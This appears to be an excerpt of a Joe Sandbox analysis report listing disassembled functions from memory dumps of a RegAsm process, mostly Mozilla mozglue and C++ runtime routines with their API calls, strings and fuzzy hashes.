Function 6C7B9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C7B985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C7B987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C7B98DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C7B98D9

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 2edbf11fab81ea64f48696131a6623fc8d477d4a8ad77f81f90a0cdf5dc253b3
Instruction ID: b9f50a0c39cff618d11656b3268a35a51a92f60cb899e666c5c384f5938c6ef1
Opcode Fuzzy Hash: 2edbf11fab81ea64f48696131a6623fc8d477d4a8ad77f81f90a0cdf5dc253b3
Instruction Fuzzy Hash: 0D31F471B0010C5FDF14AF59DD489EE77B9EB88318F50802DEA1AABB40CB31A9048BE1

Function 6C7946E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C794721

Part of subcall function 6C744410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C783EBD,00000017,?,00000000,?,6C783EBD,?,?,6C7442D2), ref: 6C744444

Strings

-%llu, xrefs: 6C794733
., xrefs: 6C79476A
profiler-paused, xrefs: 6C7946E4

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 20ab05dca82da5b9bc37e885930bac557a8b6adc101115d4a75e26e3bc1978b0
Instruction ID: 22677ca9888b4b9692d9a69648bb92275ff7ba3e3c8a5dab35bf7b5df5d67661
Opcode Fuzzy Hash: 20ab05dca82da5b9bc37e885930bac557a8b6adc101115d4a75e26e3bc1978b0
Instruction Fuzzy Hash: 5A313575F042085FCB08CF7DE99569EBBE6DB88314F14853EE8159BB81EB7099048B90

Function 6C79B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C744290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C783EBD,6C783EBD,00000000), ref: 6C7442A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C79B127), ref: 6C79B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C79B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C79B4E4

Strings

pid:, xrefs: 6C79B4DE

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 0d29203872ba66409156e34af5f7811c1195a4180301b5459257b632e90cd3a5
Instruction ID: 04e3b50dc91a140a0025ffb491f8e890b191c01348d9e5e0c3fb1a6fb38db4a5
Opcode Fuzzy Hash: 0d29203872ba66409156e34af5f7811c1195a4180301b5459257b632e90cd3a5
Instruction Fuzzy Hash: 5C313331A012098FCB20CFA9EA84AEEB7B5FF44308F540539D8216BA41D731F984DBE1

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48

Function 6C75BF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C7A7A3F), ref: 6C75BF11
?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C7A7A3F), ref: 6C75BF5D
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C7A7A3F), ref: 6C75BF7E

Strings

{l, xrefs: 6C75BF84

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
String ID: {l
API String ID: 4279176481-481446490
Opcode ID: da020c1eded8a1e0a4ce556665f1897f9d2df3c9c6f8e91a5c691d7646d151c5
Instruction ID: 1df4ead6a6856c9109abfe9f6ec34dfdfc4dc178dccec574c784dcd5a5c81aa9
Opcode Fuzzy Hash: da020c1eded8a1e0a4ce556665f1897f9d2df3c9c6f8e91a5c691d7646d151c5
Instruction Fuzzy Hash: 1A11BF792006058FC729CF0CD69992AFBF8FB5930531588ADE98A8B750C731B800CF90

Function 6C74F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C7BD020), ref: 6C74F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C74F132

Strings

shell32, xrefs: 6C74F11D
SHGetKnownFolderPath, xrefs: 6C74F12C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: a3478bd9044136ccfcb7adac0df1ab91a43822911e362e9dd98566c784841cbc
Instruction ID: ca17d6b97362c2a6ced9409a82cf74882632a614184a2c30bbf9b7027c43e0db
Opcode Fuzzy Hash: a3478bd9044136ccfcb7adac0df1ab91a43822911e362e9dd98566c784841cbc
Instruction Fuzzy Hash: C0015A7170021AEFDB009F69ED48A9B7BF8FF4A794B504529F949E7600D730AA00CBA0

Function 6C78E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C78E577
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E584
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C78E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C78E826
[I %d/%d] profiler_start, xrefs: 6C78EBB4
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C78E655
MOZ_PROFILER_STARTUP, xrefs: 6C78E5A1, 6C78E5FF
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C78E777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C78E722
-21-2246122658-369X, xrefs: 6C78EADC

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: -21-2246122658-369X$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$[I %d/%d] profiler_start
API String ID: 1483687287-1685988782
Opcode ID: fd015b127a6314fe77a7e25d475c4d5eb350be6d717029b1469feddb5da93d9b
Instruction ID: 13070c1e85dfaf123b12a9dd824c2cedfff2b5e880775997ea92699dfb82b23b
Opcode Fuzzy Hash: fd015b127a6314fe77a7e25d475c4d5eb350be6d717029b1469feddb5da93d9b
Instruction Fuzzy Hash: B011ED32B0024ADFCB009F15C948A6ABBB8FB89728F400639F86147A50C774AA44CBD2

Function 6C7AA3C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 6C759830: free.MOZGLUE(?,?,?,6C7A7ABE), ref: 6C75985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C7AA3FD
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C7AA405
free.MOZGLUE(?), ref: 6C7AA412

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

Strings

{l, xrefs: 6C7AA3ED

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSectionfree$??1?$basic_streambuf@??1ios_base@std@@D@std@@@std@@EnterLeaveU?$char_traits@memset
String ID: {l
API String ID: 792927661-481446490
Opcode ID: 5bb7224adf0486c5e28e5242056181a14af1342bbbe86728e112a5549b54d876
Instruction ID: aab8c240704d0c5d7b8b47c00340f05d62ad986e527ca0b9d268419fb10ee2c7
Opcode Fuzzy Hash: 5bb7224adf0486c5e28e5242056181a14af1342bbbe86728e112a5549b54d876
Instruction Fuzzy Hash: D2F0A4757002448FDB04CF09D88D9AEB774FF45308B1004ADE8069B715D731690ECB81

Function 6C77AB89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

Strings

p|l, xrefs: 6C77AB8E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: p|l
API String ID: 3168844106-1602081898
Opcode ID: bc2c762ec9eb7dbdca8df2302799004bcdb0900bb58ee4a1bf9764ea4e7af560
Instruction ID: a371b0beb6de142e963d1d7beb63d5ef59eb084dac41f65741ec07721d199de1
Opcode Fuzzy Hash: bc2c762ec9eb7dbdca8df2302799004bcdb0900bb58ee4a1bf9764ea4e7af560
Instruction Fuzzy Hash: A3F0BE3020020EDFDB209F14C509B24777AEB83B35F100639E96143AD0C734A581CA61

Function 6C77CBE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

Strings

<jemalloc>, xrefs: 6C77CFFC
: (malloc) Error in VirtualFree(), xrefs: 6C77D001

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2429186680-2186867486
Opcode ID: a1401aea7f6064396c6ae875b1cb6dd9571cf22421fdff52091b3bf4af7a3b77
Instruction ID: 445d5a04eb33360dd0d964123f03b09f17cbe6d2fcb3ea55014e0c0f10d08269
Opcode Fuzzy Hash: a1401aea7f6064396c6ae875b1cb6dd9571cf22421fdff52091b3bf4af7a3b77
Instruction Fuzzy Hash: 05B092706043099FDB102BB4980DB093B7CB749A01F000838B20282241CBB9B2008E61

Function 6C752272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C75237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C752B9C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 6122712c9fab7778a6078756c66cbe1d987d2b44bf225bb80bb4b86b3864fa58
Instruction ID: aa0c5135132a050747f178f6f3eaffc7ba5907cb0446d816ad9311764fb1c399
Opcode Fuzzy Hash: 6122712c9fab7778a6078756c66cbe1d987d2b44bf225bb80bb4b86b3864fa58
Instruction Fuzzy Hash: 25E18071A002058FDB08CF59C9D8B9EBBB2FF88314F598168E9055B745DB71EC95CB90

Function 6C790C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C790CD5

Part of subcall function 6C77F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,6C755407), ref: 6C77F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C790D40
free.MOZGLUE ref: 6C790DCB

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

free.MOZGLUE ref: 6C790DDD
free.MOZGLUE ref: 6C790DF2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 409b67564343a759f49d296b5f3757288a3e327bcf45a5d3d4073fa6946b2988
Instruction ID: de5b14313100e7f9a0ec599ed895281aa45d86eb45484d04cf49958e0720143a
Opcode Fuzzy Hash: 409b67564343a759f49d296b5f3757288a3e327bcf45a5d3d4073fa6946b2988
Instruction Fuzzy Hash: FA415B719187848BD720CF29D28579EFBE5BFC9714F108A2EE8D887751D7709844CB82

Function 6C799120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C799188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 6C7991BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F), ref: 6C7991EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 6C799200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C799219

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 1d1ecd067c9c04a3eb88313ee98662af6e6f04d6446e5fd2096cfe69fde05a30
Instruction ID: 23305c9f2626b1f1bc3318a4aa1645b2244aa83f63fab50245ff75f9cbf64188
Opcode Fuzzy Hash: 1d1ecd067c9c04a3eb88313ee98662af6e6f04d6446e5fd2096cfe69fde05a30
Instruction Fuzzy Hash: 16316131A006058FFB00CF28EC4536A73B9FF91311F548639D84ACB640EB30E944CBA2

Function 6C780800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C780838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C78084C
EnterCriticalSection.KERNEL32(?), ref: 6C7808AF
LeaveCriticalSection.KERNEL32(?), ref: 6C7808BD
LeaveCriticalSection.KERNEL32(6C7CE7DC), ref: 6C7808D5

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 6d7c55f2519421781e3d83cb96965037324f90882733b2a745e54b8c3f8c40de
Instruction ID: c91a6bfb6081f36e2d41414ba271ae8d31ac728a9b86cc4c26881f79aa87a053
Opcode Fuzzy Hash: 6d7c55f2519421781e3d83cb96965037324f90882733b2a745e54b8c3f8c40de
Instruction Fuzzy Hash: 4F21C53170220E9FDF04CF66D989BAE73B9BF45708F900538EA09A7A40DF35A6448BD1

Function 6C751720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C7517B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C7518EE
free.MOZGLUE(?), ref: 6C751911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C75194C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 146d383fb3506956dbb782713dc68e71f12b40bbf80322018e618e87087e8c58
Instruction ID: 86757ec0c125838a3f240deb5ab10ccfeae3ba6277affa4854e54d4ed5e60e2f
Opcode Fuzzy Hash: 146d383fb3506956dbb782713dc68e71f12b40bbf80322018e618e87087e8c58
Instruction Fuzzy Hash: EC81D570A102059FCB08CF68D9D49EEBBB1FF89315F44452CE811AB755DB30E964CBA2

Function 6C765C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C765D40
EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C765D67
__aulldiv.LIBCMT ref: 6C765DB4
LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C765DED

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 5cf43fbc30924883be0344df0f2b3b452271f13e2285c85498f47e829731be4c
Instruction ID: dcbe55ccae321a77812ac6eb3c9b9d2d8f470011705fe640ef79fd9722c7008b
Opcode Fuzzy Hash: 5cf43fbc30924883be0344df0f2b3b452271f13e2285c85498f47e829731be4c
Instruction Fuzzy Hash: 54516171E0011A8FDF08CF69C995ABEBBB1FB85304F19862DD855B7B91C7306A45CB90

Function 6C7A7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C7A7250
EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C7A7277
__aulldiv.LIBCMT ref: 6C7A72C4
LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C7A72F7

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
